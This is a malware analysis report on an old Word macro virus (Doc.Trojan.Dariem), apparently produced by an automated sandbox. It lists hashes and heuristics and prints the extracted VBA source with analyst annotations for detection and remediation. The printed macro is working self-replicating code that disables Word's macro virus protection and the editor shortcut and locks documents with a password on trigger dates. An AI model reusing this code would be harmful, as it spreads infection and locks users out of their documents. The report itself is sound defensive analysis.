Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 135bc81887dc1abe…

MALICIOUS

Office (OLE)

34.5 KB Created: 2009-08-22 11:21:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 48dac06dd2b775a013cd0b52acf2ab7d SHA-1: e713281419db6aafecedd3d6e082e0444422b97e SHA-256: 135bc81887dc1abe46144204325290a04da57831c744c8c63c22bcd37efc859e
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

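The sample is a malicious Word document containing VBA macros, including a Document_Open macro (flagged by the OLE_VBA_DOCOPEN heuristic). The ClamAV detection 'Doc.Trojan.Dariem-1' strongly indicates malicious intent. The VBA script, which is truncated in the preview below, contains comments suggesting a personal message, but it also includes code that modifies document properties and potentially executes further actions, which the analysis characterizes as typical of a macro-based downloader. Note that the visible portion of the preview contains no download or network code. What it does show is the macro copying VBA source from the Normal template into the active document, setting Options.VirusProtection to 0, disabling the Alt+F11 key binding, and applying a hard-coded document password on two calendar dates, so the downloader characterization should be confirmed against the full macros.bas artifact.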

Heuristics 3

  • ClamAV: Doc.Trojan.Dariem-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Dariem-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6239 bytes
SHA-256: c569f05e17593739c20cbd3b40b4300ddd4f448654ab333896f643371eb034b1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' [analyst] Module-level declarations of the extracted "ThisDocument" module.
' [analyst] Lines starting with "' [analyst]" are annotations and are not part of the
'           sample; the author's own comments are kept verbatim because they are
'           artifacts of the sample (the string "Dariem" recurs as a marker below).

' [analyst] Author comment, roughly: "For my dear son: Dariem Alexander, from his dad".
'Para mi querido hijo:
'Dariem Alexander
'de su papá +i+o :-(>
'   ¦
'   V
' [analyst] T receives ActiveDocument.Saved in Document_Close; it is not read in the
'           visible part of the preview. E_xiste is not referenced in the visible part.
Dim T As Boolean
Dim E_xiste As Boolean

' [analyst] A_miDocumento / M_iPlantilla are set by the event handlers to the first
'           VBComponent of the active document and of the Normal template respectively;
'           O_codigo holds macro source text read from one of those components.
Dim A_miDocumento As Object
Dim M_iPlantilla As Object
Dim O_codigo As String
'   |
'   V
'    —> Rosemary
'
'   Date: 11/02/2000
' [analyst] Tab-separated text that Document_New writes into the primary footer on the
'           trigger dates; the date inside it reads "03 February 1995".
Const MENSAJE = "Dariem" & vbTab & "03 de Febrero de 1995" & vbTab & "R.C.A. - Chinita"

' [analyst] Document_Close runs when the document is closed. In order, it:
'   1. rewrites the document's summary properties with fixed strings (on 3 Feb and
'      26 Feb it additionally sets a hard-coded password through the Save options dialog);
'   2. copies the Normal template's macro source into the document when the document
'      has no code of its own;
'   3. disables the Alt+F11 key binding and one menu entry, then saves the Normal template.
' [analyst] The fixed Author/Keywords/Subject/Comments values are stable strings that can
'           be used to find affected documents.
Private Sub Document_Close()
' [analyst] Every runtime error is suppressed, so a failing step does not raise a dialog.
On Error Resume Next
' [analyst] First VBA component of the open document and of the global Normal template.
Set A_miDocumento = ActiveDocument.VBProject.VBComponents.Item(1)
Set M_iPlantilla = NormalTemplate.VBProject.VBComponents.Item(1)

' [analyst] Date trigger: 26 February or 3 February (any year).
If (Day(Now()) = 26 And Month(Now()) = 2) Or (Day(Now()) = 3 And Month(Now()) = 2) Then
    ' [analyst] Sets the Password field of the Save options dialog to the literal "Dariem"
    '           and applies it. Because the value is hard-coded, it is the password to try
    '           when recovering a document locked by this sample.
    With Dialogs(wdDialogToolsOptionsSave): .Password = "Dariem": .Execute: End With
    ' [analyst] Overwrites the summary-info properties; the Chr() sequence spells "Rosemary".
    With Dialogs(wdDialogFileSummaryInfo):
        .Title = "Viva el Perú Carajo"
        .Subject = "Fueron advertidos, el Perú rumbo al desarrollo"
        .Author = "+orreBlA¦\¦CA":
        .Keywords = "The Best":
        .Comments = "For two people to who I love: Dariem and...." & Chr(82) _
        & Chr(111) & Chr(115) & Chr(101) & Chr(109) & Chr(97) & Chr(114) & Chr(121) & " Dear, Adored, Friend":
        .Execute:
    End With
    T = ActiveDocument.Saved
Else
    ' [analyst] Non-trigger dates: same Author/Keywords/Comments, empty Title and a
    '           different Subject; no password is set on this path.
    With Dialogs(wdDialogFileSummaryInfo):
        .Title = ""
        .Subject = "Cuidado, tengan mucho cuidado"
        .Author = "+orreBlA¦\¦CA":
        .Keywords = "The Best":
        .Comments = "For two people to who I love: Dariem and...." & Chr(82) _
        & Chr(111) & Chr(115) & Chr(101) & Chr(109) & Chr(97) & Chr(114) & Chr(121) & " Dear, Adored, Friend":
        .Execute:
    End With
    T = ActiveDocument.Saved
End If

' [analyst] Reads the full source of the document's first component.
O_codigo = A_miDocumento.CodeModule.Lines(1, A_miDocumento.CodeModule.CountOfLines)
If O_codigo = "" Then
    ' [analyst] Document has no macro code: take the Normal template's source and insert
    '           it into the document. This is the template-to-document propagation step.
    O_codigo = M_iPlantilla.CodeModule.Lines(1, M_iPlantilla.CodeModule.CountOfLines)
    A_miDocumento.CodeModule.DeleteLines 1, A_miDocumento.CodeModule.CountOfLines
    A_miDocumento.CodeModule.AddFromString O_codigo
    A_miDocumento.Save
Else
    ' [analyst] Binary (case-sensitive) search for the marker string "Dariem" in the
    '           document's existing code. O_codigo still holds the document's own source
    '           here, so this branch writes back the same text it read.
    If InStr(1, O_codigo, "Dariem", 0) = 0 Then
        A_miDocumento.CodeModule.DeleteLines 1, A_miDocumento.CodeModule.CountOfLines
        A_miDocumento.CodeModule.AddFromString O_codigo
        A_miDocumento.Save
    End If
End If
A_miDocumento.Save

' [analyst] Customizations are stored in the Normal template, so they apply to every
'           document opened afterwards. Alt+F11 is the shortcut for the Visual Basic Editor.
CustomizationContext = NormalTemplate
FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable

' [analyst] Disables a menu entry addressed by position (6th menu, 13th item), which
'           presumably targets the macro entry of the Tools menu. The index depends on
'           the Word version and language, so confirm against the affected installation.
Set myMenuBar = CommandBars.ActiveMenuBar
Set newMenu = myMenuBar.Controls.Item(6).Controls.Item(13)
newMenu.Enabled = False

' [analyst] Persists the key-binding change to the Normal template; remediation therefore
'           has to include the Normal template, not only the affected document.
NormalTemplate.Save

End Sub

Private Sub Document_New()
On Error Resume Next
Set A_miDocumento = ActiveDocument.VBProject.VBComponents.Item(1)
Set M_iPlantilla = NormalTemplate.VBProject.VBComponents.Item(1)
With Options:
    .ConfirmConversions = 0:
    .VirusProtection = 0:
    .SaveNormalPrompt = 0:
End With
With Dialogs(wdDialogFileSummaryInfo):
    .Title = ""
    .Subject = "Cuidado, tengan mucho cuidado"
    .Author = "+orreBlA¦\¦CA":
    .Keywords = "The Best":
    .Comments = "For two people to who I love: Dariem and...." & Chr(82) _
    & Chr(111) & Chr(115) & Chr(101) & Chr(109) & Chr(97) & Chr(114) & Chr(121) & " Dear, Adored, Friend":
    .Execute:
End With
O_codigo = M_iPlantilla.CodeModule.Lines(1, M_iPlantilla.CodeModule.CountOfLines)
A_miDocumento.CodeModule.DeleteLines 1, A_miDocumento.CodeModule.CountOfLines
A_miDocumento.CodeModule.AddFromString O_codigo
NormalTemplate.Save

If (Day(Now()) = 26 And Month(Now()) = 2) Or (Day(Now()) = 3 And Month(Now()) = 2) Then
    With ActiveDocument.Sections(1)
        .Footers(wdHeaderFooterPrimary).Range.Text = MENSAJE
    End With
    Set myMenuBar = CommandBars.ActiveMenuBar
    Set newMenu = myMenuBar.Controls.Item(3).Controls.Item(8)
    newMenu.Enabled = False
    Set newMenu = myMenuBar.Controls.Item(3).Controls.Item(9)
 
... (truncated)